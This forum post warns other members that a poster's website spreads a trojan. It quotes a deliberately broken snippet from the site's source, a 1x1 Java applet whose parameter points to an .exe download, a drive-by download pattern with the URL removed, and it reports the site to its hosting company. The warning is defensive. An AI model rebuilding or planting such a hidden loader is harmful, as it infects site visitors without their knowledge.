Dream Bruizer, I'm not so sure about that. Looking at what Symantec's website says about this particular trojan plus that fact that I am fully current on Windows updates (XP Pro), plus the fact that the source code of his website has code that shows it pushing the .exe file, plus the fact he's coming to a non-Audi forum and all but taunting people, I think this little bugger is up to no good.
Here's the snippet from his source code: "applet code="BlackBox.class" archive="coderunZklsQ.jar" width=1 height=1 onerror="onError()"><param name="eurl" value="http://URL changed here by Mike-in-Orange for safety's sake!:80/hp.exe"></applet" NOTE: I removed certain brackets to ensure fully broken code.....I'm not taking ANY chances here!
So....I did a quick Who Is lookup and traced him back to the hosting company he's using in Costa Mesa California. I contacted them and told them what he's doing. I figure his site will be down within 24 hours.
|